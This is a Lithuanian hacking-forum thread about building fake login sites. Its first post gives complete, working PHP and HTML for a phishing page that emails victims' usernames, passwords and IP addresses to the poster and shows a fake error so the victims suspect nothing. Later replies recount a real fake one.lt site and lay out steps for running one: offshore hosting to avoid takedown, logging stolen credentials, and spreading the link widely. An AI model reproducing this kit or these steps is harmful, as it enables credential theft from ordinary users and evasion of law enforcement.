Fake site atakos

[MaksasMks]

Vo Rugsėjis, toi išvarysiu, bet dar db parašysiu php skriptą. Tipo su laukeliais login ir password, įvedus duomenis, jie jums į emailą pareis.

[MaksasMks]

Reikia paleistį failą "skriptas.php" tuomet ten bus laukeliai "Vartotojas" ir "Slaptažodis" ivedus duomenis pamatysit "Error... Please try later.", o tai reiškia, kad viskas ok ir į jūsų emaila jau keliauja duoemnys.

Skriptas.php

Kodas: Pasirinkti visus

<html>
<head>
<meta http-equiv="Content-Language" content="lt">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1257">
<title>Login</title>
<style>
<!--
.laukeliai { color: #000000; font-size: 8pt; font-family: Verdana, Arial, Helvetica, sans-serif  }
-->
</style>
</head>
<body link="#000000" vlink="#000000" alink="#000000" topmargin="4" leftmargin="4" bgcolor="#FFFFFF" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #000000">

<form method="POST" action="sistema.php">
<p align="center">
<br/>
Vartotojas:&nbsp;&nbsp;<input name="vartotojas" type="text" class="laukeliai" id="vartotojas" size="20">  
</p>
<p align="center">Slaptažodis: 
  <input name="pass" type="password" class="laukeliai" id="pass" size="20">
</p>
<p align="center">
  <input type="submit" value="Jungtis" name="B1" class="laukeliai">
</p>
</form>
</body>
</html>

sistema.php

Kodas: Pasirinkti visus

<html>
<head>
<meta http-equiv="Content-Language" content="lt">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1257">
<title>Login</title>
<style>
<!--
.laukeliai { color: #000000; font-size: 8pt; font-family: Verdana, Arial, Helvetica, sans-serif }
-->
</style>
</head>
<body link="#000000" vlink="#000000" alink="#000000" topmargin="4" leftmargin="4" bgcolor="#FFFFFF" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #000000">
<p align="center">
<?php
// Skripto autorius MaksasMks
// Jeigu skripte radote klaidu parasykit i emaila MaksasMks@one.lt
// Taip pat rasau skriptus uz litus

// Gaunami duomenys:
$vartotojas = $_POST["vartotojas"];
$pass = $_POST["pass"];
$ip = $REMOTE_ADDR;

// Administratoriaus emailas i kuri bus siunciami duomenys:
$admin_mail = "MaksasMks@one.lt";

// Temos laukelis (tema matysit kai gausit laiska}:
$tema = "Aukos duomenys";

// Formuojamas laiskas:
$suformuotas_lai?kas = "
Vartotojas: $vartotojas
Slaptazodis: $pass
Siuntejo IP: $ip";

// Jeigu kaskuris laukelis neuzpildomas tuomet rodo:
// Patikrina ar netuscias vartotojo laukelis:
$zinute = "Tušcias vartotojo laukelis.";
if ($vartotojas != "")
{
// Patikrina ar slaptazodis ivestas:
$zinute = "Tušcias slaptažodžio laukelis.";
if ($pass != "")
{
// Siuntimo funkcija (jeigus viskas ok meta):
mail ($admin_mail, $tema, $suformuotas_lai?kas);
$zinute = "Error... Please try later.";
}
}
// Rodomas rezultatas:
echo $zinute;
?>
</p>
</body>
</html>

Nu va arba toks, čia biški kitoks "skriptas.php"

Kodas: Pasirinkti visus

<html>
<head>
<meta http-equiv="Content-Language" content="lt">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1257">
<title>Login</title>
<style>
<!--
.laukeliai { color: #000000; font-size: 8pt; font-family: Verdana, Arial, Helvetica, sans-serif  }
input.text_box { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; BORDER-LEFT: #000000 1px solid; COLOR: #000000; BORDER-BOTTOM: #000000 1px solid; color: #000000; font-size: 8pt; font-family: Verdana }
input.text_box2 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; BORDER-LEFT: #000000 1px solid; COLOR: #000000; BORDER-BOTTOM: #000000 1px solid; color: #000000; font-size: 8pt; font-family: Verdana }
-->
</style>
</head>
<body link="#000000" vlink="#000000" alink="#000000" topmargin="4" leftmargin="4" bgcolor="#FFFFFF" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #000000">

<form method="POST" action="sistema.php">
<p align="center">
<br/>
Vartotojas:&nbsp;&nbsp;<input class="text_box" type="text" name="vartotojas" maxlength="<? print $max_vardas; ?>" size="20" class="laukeliai"></p>
<p align="center">Slaptažodis: 
  <input class="text_box2" type="password" name="pass" maxlength="<? print $max_vardas; ?>" size="20" class="laukeliai">
</p>
<p align="center">
  <input type="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;Jungtis&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" class="text_box2" name="B1" class="laukeliai">
</p>as
</form>
</body>
</html>

Nu ir viskas db įgruskit kur nors :]

[live4hack]

nu dar cia papostinsiu kad iskiltu i viesuma tema =] man tai neveikia tas skriptas gal yra klaidu ??? parashykit jei pastebesit ( as tai nematau )
pakeiciau as e maila i sawo bet nk nesiuncia man. trumpiau sakant kodel taip ira???

[oxigen]

Aš tai prie tos pačios temos pridėsiu, kad visai neseniai buvo atsiradęs fake one.lt tinklapis, kuriame žadėjo nemokamas dovanas, tokia skaip 30 įvertinimas, papildomos foto ir panašiai už tai, kad įvesi savo slaptažodį ir user 'į. Tai platino visi kas netingėjo ir kaip supratau tai buvo ir užkibusių, tačiau cyberolice.lt po dienos uždarė tą tinklapį.

[Šaras]

Aš tai prie tos pačios temos pridėsiu, kad visai neseniai buvo atsiradęs fake one.lt tinklapis, kuriame žadėjo nemokamas dovanas, tokia skaip 30 įvertinimas, papildomos foto ir panašiai už tai, kad įvesi savo slaptažodį ir user 'į. Tai platino visi kas netingėjo ir kaip supratau tai buvo ir užkibusių, tačiau cyberolice.lt po dienos uždarė tą tinklapį.

Jo bet padarytas labai lievai buvo ;D Siųlė man to saito DB, bet man nereikalinga jinai ;]

[koksas]

Fake site tai istikruju kaip manau reiktu daryti...

1)Uzsisakyk hosta kad ir nemokama bet kokioj kad ir kanadoj kur nors kur lietuviai negaletu jo uzdaryti... uzsisakyk koki nors adresa kad butu sunkiau atsekti...
2)Padaryk toki skripta kuris veiktu..: Zmogus suvestu savo login ir password ir tie abu dalykai issisaugotu paprastame Notepad.txt faile taip manau geriau daug butu
3) Isreklamuok saita visur.

Manau kad cyperpolice net nesugebes jo uzdaryti jai hostas bus pakankamai tylus.

Manau pats pabandysiu

[oxigen]

Fake site tai istikruju kaip manau reiktu daryti...

1)Uzsisakyk hosta kad ir nemokama bet kokioj kad ir kanadoj kur nors kur lietuviai negaletu jo uzdaryti... uzsisakyk koki nors adresa kad butu sunkiau atsekti...
2)Padaryk toki skripta kuris veiktu..: Zmogus suvestu savo login ir password ir tie abu dalykai issisaugotu paprastame Notepad.txt faile taip manau geriau daug butu
3) Isreklamuok saita visur.

Manau kad cyperpolice net nesugebes jo uzdaryti jai hostas bus pakankamai tylus.

Manau pats pabandysiu

Lietuviai uždarys bet kokį tinklapį bet kokiame interneto talpinimo serveryje, čia neturi esmės...

[live4hack]

eee gerai bet kokia komanda kad irashytu i apprasta notepad ir kokiam nors ftp ishsaugotu???

[oxigen]

eee gerai bet kokia komanda kad irashytu i apprasta notepad ir kokiam nors ftp ishsaugotu???

Tai laikas pradėti mokintis PHP (jeigu surpatau teisingai tavo mintį) nes tau kodo čia niekas nerašinės